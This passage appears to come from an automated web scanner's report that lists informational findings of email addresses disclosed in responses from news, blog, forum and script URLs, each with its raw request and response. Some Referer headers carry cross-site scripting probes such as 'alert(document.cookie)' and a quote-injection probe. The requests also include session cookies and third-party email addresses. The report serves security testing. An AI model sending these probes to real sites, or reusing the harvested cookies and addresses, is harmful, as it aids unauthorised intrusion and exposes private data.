User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:05 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Sun, 30 Jan 2011 01:53:08 GMT
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://blogs.discovermagazine.com/loom/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 151314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href='http://dwyersuncreation@aol.com' rel='external nofollow' class='url' onclick="javascript:urchinTracker('/outbound/dwyersuncreation_aol.com?ref=http_//www.bing.com');">
...[SNIP]...

26.8. http://bodyodd.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bodyodd.msnbc.msn.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: bodyodd.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:06:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109649

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>The Body Odd</title>
<met
...[SNIP]...
<a href="mailto:bodyodd@msnbc.com">
...[SNIP]...

26.9. http://boyle.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boyle.newsvine.com
Path:   /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js HTTP/1.1
Host: boyle.newsvine.com
Proxy-Connection: keep-alive
Referer: http://boyle.newsvine.com/?ab874%22-alert(1)-%221395f8ac659=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=8d410fec781195f3ae452149bdba91fe

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:54:29 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 22 Jul 2008 22:32:25 GMT
ETag: "17c51e-2f1b-452a465ed3040"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:54:29 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Connection: Keep-Alive
Content-Length: 12059

/**
* CPAINT - Cross-Platform Asynchronous INterface Toolkit
*
* http://cpaint.sourceforge.net
*
* released under the terms of the LGPL
* see http://www.fsf.org/licensing/licenses/lgpl.txt for
...[SNIP]...
<wiley14@gmail.com>
...[SNIP]...
<dstender@st-webdevelopment.de>
...[SNIP]...

26.10. http://cosmiclog.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cosmiclog.msnbc.redacted
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:07:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145284

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cosmic Log</title>
<meta
...[SNIP]...
<a href="mailto:alanboyle@feedback.msnbc.com">
...[SNIP]...

26.11. http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cosmiclog.msnbc.redacted
Path:   /_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Issue detail

The following email address was disclosed in the response:

Request

GET /_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/?GT1=43001 HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches?GT1=43001
Content-Type: text/html
Cache-Control: max-age=282
Date: Sat, 29 Jan 2011 23:45:48 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cosmic Log - Egyptians ru
...[SNIP]...
<a href="mailto:alanboyle@feedback.msnbc.com">
...[SNIP]...

26.12. http://curmudgeons.blogspot.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://curmudgeons.blogspot.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: curmudgeons.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sun, 30 Jan 2011 02:07:57 GMT
Date: Sun, 30 Jan 2011 02:07:57 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Sat, 29 Jan 2011 22:50:38 GMT
ETag: "3769e370-63c6-4a98-8a60-8feefd5f390b"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Curmudgeons Corner</title>
<style>
body    {background:#666666;margin: 0px;font-family: Verdana, Arial, sans-se
...[SNIP]...
<a HREF=MAILTO:MWHITTINGT@SPRYNET.COM>
...[SNIP]...

26.13. http://docs.jquery.com/Plugins/Validation

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /Plugins/Validation

Issue detail

The following email address was disclosed in the response:

Request

GET /Plugins/Validation HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:11 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 08 Dec 2010 11:37:59 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<li> Remote validation of email field. Try to enter eg. glen@marketo.com
</li>
...[SNIP]...

26.14. http://editorial.autos.redacted/blogs/autosblog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /blogs/autosblog.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /blogs/autosblog.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f2055ff4949f4938b5733da1ed24544e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=30C61D772A2040BEA40CE77407721D63; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:07 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<a href="mailto:autosblog@live.com">autosblog@live.com</a>
...[SNIP]...

26.15. http://fancybox.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fancybox.net
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: fancybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 9835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equ
...[SNIP]...
<input type="hidden" name="business" value="janis.skarnelis@gmail.com" />
...[SNIP]...

26.16. http://forums.silverlight.net/forums/19.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/19.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /forums/19.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73133
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:15 GMT; expires=Sun, 29-Jan-2012 23:18:15 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:15 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Design
...[SNIP]...
<a class="dim" href="/members/skm.software_4000_yahoo.com.aspx">skm.software@yahoo.com</a>
...[SNIP]...

26.17. http://forums.silverlight.net/forums/65.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/65.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /forums/65.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 64898
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:42 GMT; expires=Sun, 29-Jan-2012 23:17:43 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:43 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Manage
...[SNIP]...
<a title="vnjayakumar@hotmail.com" class="dim" href="/user/profile.aspx?UserID=59653">
...[SNIP]...

26.18. http://helenaspopkin.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://helenaspopkin.newsvine.com
Path:   /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js HTTP/1.1
Host: helenaspopkin.newsvine.com
Proxy-Connection: keep-alive
Referer: http://helenaspopkin.newsvine.com/?e5470%22-alert(1)-%222158d48b318=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=f02f9cb34b8692be67ae217ef748e81a

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:58:21 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 22 Jul 2008 22:32:25 GMT
ETag: "17c51e-2f1b-452a465ed3040"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:58:21 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Connection: Keep-Alive
Content-Length: 12059

/**
* CPAINT - Cross-Platform Asynchronous INterface Toolkit
*
* http://cpaint.sourceforge.net
*
* released under the terms of the LGPL
* see http://www.fsf.org/licensing/licenses/lgpl.txt for
...[SNIP]...
<wiley14@gmail.com>
...[SNIP]...
<dstender@st-webdevelopment.de>
...[SNIP]...

26.19. http://i1.codeplex.com/scripts/v17501/i1879048191/ScriptLoader.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i1.codeplex.com
Path:   /scripts/v17501/i1879048191/ScriptLoader.ashx

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/v17501/i1879048191/ScriptLoader.ashx HTTP/1.1
Host: i1.codeplex.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=aa53c1dyzeonloxydyax0t0n

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: public, max-age=30103376
Expires: Fri, 13 Jan 2012 22:52:34 GMT
Date: Sun, 30 Jan 2011 12:49:38 GMT
Connection: close
Content-Length: 565074

var s_account="msstocodeplex",omniGuidPath="://www.codeplex.com/site/analyticsid.aspx";if(window.location.hostname.toLowerCase().indexOf("codeplex.com")==-1||window.location.hostname.toLowerCase().ind
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

26.20. http://i2.silverlight.net/resources/script/omniture/s_code_dotnet.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i2.silverlight.net
Path:   /resources/script/omniture/s_code_dotnet.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/script/omniture/s_code_dotnet.min.js?cdn_id=12152010 HTTP/1.1
Host: i2.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 16 Dec 2010 22:47:09 GMT
Accept-Ranges: bytes
ETag: "23f9132c739dcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: max-age=90546331
Date: Sat, 29 Jan 2011 23:14:48 GMT
Connection: close
Content-Length: 22031

function omniGetCookie(b){var d=document.cookie.indexOf(b+"=");if(d!=-1){var c=d+b.length+1;var a=document.cookie.indexOf(";",c);if(a==-1){a=document.cookie.length}return unescape(document.cookie.subs
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

26.21. http://images.hoovers.com/dc/js/omniture/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.hoovers.com
Path:   /dc/js/omniture/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /dc/js/omniture/s_code.js HTTP/1.1
Host: images.hoovers.com
Proxy-Connection: keep-alive
Referer: http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml?7ffa5%22%3balert(document.cookie)//4d5eca5bcd1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HID=10.1.1.227.122391296352471936

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "8ea2-4acb845d"
Last-Modified: Tue, 06 Oct 2009 17:54:37 GMT
Accept-Ranges: bytes
Content-Length: 36514
Content-Type: application/javascript
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Cache-Control: public, max-age=38904
Expires: Sun, 30 Jan 2011 12:43:11 GMT
Date: Sun, 30 Jan 2011 01:54:47 GMT
Connection: close

<!--

/**
* Omniture javascript
*
* @version $Id: s_code.js,v 1.13 2009/09/19 03:20:36 mkelnar Exp $
* @author $Author: mkelnar $
* @date $Date: 2009/09/19 03:20:36 $
* @copyri
...[SNIP]...
';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.
...[SNIP]...

26.22. http://informationarbitrage.com/api/read/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://informationarbitrage.com
Path:   /api/read/json

Issue detail

The following email addresses were disclosed in the response:

Request

GET /api/read/json?callback=jsonp1296398930692&num=50&start=500&_=1296398980063 HTTP/1.1
Host: informationarbitrage.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=169606777.1296398928.1.1.utmcsr=news.ycombinator.com|utmccn=(referral)|utmcmd=referral|utmcct=/news; __utma=169606777.1419262746.1296398928.1296398928.1296398928.1; __utmc=169606777; __utmb=169606777.1.10.1296398928; __qca=P0-737707546-1296398931461; _chartbeat2=9zgu329xqu8nir6e

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
Last-Modified: Sun, 30 Jan 2011 06:32:40 GMT
X-Cache-Auto: miss
X-Robots-Tag: noindex
Cache-Control: max-age=900
Vary: Accept-Encoding
X-Tumblr-Usec: D=2154894
Content-Type: text/javascript
Date: Sun, 30 Jan 2011 14:48:46 GMT
X-Varnish: 1726568420
Age: 0
X-Cache: MISS from rack1.tumblr.com
X-Cache-Lookup: MISS from rack1.tumblr.com:80
Via: 1.1 varnish, 1.0 rack1.tumblr.com:80 (squid/2.6.STABLE6)
Connection: keep-alive
Content-Length: 472550

jsonp1296398930692({"tumblelog":{"title":"Information Arbitrage","description":"<!-- Start of StatCounter Code -->\r\n<script type=\"text\/javascript\">\r\nvar sc_project=1890207; \r\nvar sc_invisible
...[SNIP]...

26.23. http://informationarbitrage.com/api/read/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://informationarbitrage.com
Path:   /api/read/json

Issue detail

The following email address was disclosed in the response:

Request

GET /api/read/json?callback=jsonp1296398930689&num=50&start=350&_=1296398969872 HTTP/1.1
Host: informationarbitrage.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=169606777.1296398928.1.1.utmcsr=news.ycombinator.com|utmccn=(referral)|utmcmd=referral|utmcct=/news; __utma=169606777.1419262746.1296398928.1296398928.1296398928.1; __utmc=169606777; __utmb=169606777.1.10.1296398928; __qca=P0-737707546-1296398931461; _chartbeat2=9zgu329xqu8nir6e

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
Last-Modified: Sun, 30 Jan 2011 06:32:40 GMT
X-Cache-Auto: miss
X-Robots-Tag: noindex
Cache-Control: max-age=900
Vary: Accept-Encoding
X-Tumblr-Usec: D=1299757
Content-Type: text/javascript
Date: Sun, 30 Jan 2011 14:48:35 GMT
X-Varnish: 1726547383
Age: 0
X-Cache: MISS from rack1.tumblr.com
X-Cache-Lookup: MISS from rack1.tumblr.com:80
Via: 1.1 varnish, 1.0 rack1.tumblr.com:80 (squid/2.6.STABLE6)
Connection: keep-alive
Content-Length: 318311

jsonp1296398930689({"tumblelog":{"title":"Information Arbitrage","description":"<!-- Start of StatCounter Code -->\r\n<script type=\"text\/javascript\">\r\nvar sc_project=1890207; \r\nvar sc_invisible
...[SNIP]...
<a href=\"mailto:jobs@buddymedia.com\" target=\"_blank\">jobs@buddymedia.com<\/a>
...[SNIP]...

26.24. http://informationarbitrage.com/api/read/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://informationarbitrage.com
Path:   /api/read/json

Issue detail

The following email addresses were disclosed in the response:

Request

GET /api/read/json?callback=jsonp1296398930691&num=50&start=450&_=1296398976150 HTTP/1.1
Host: informationarbitrage.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
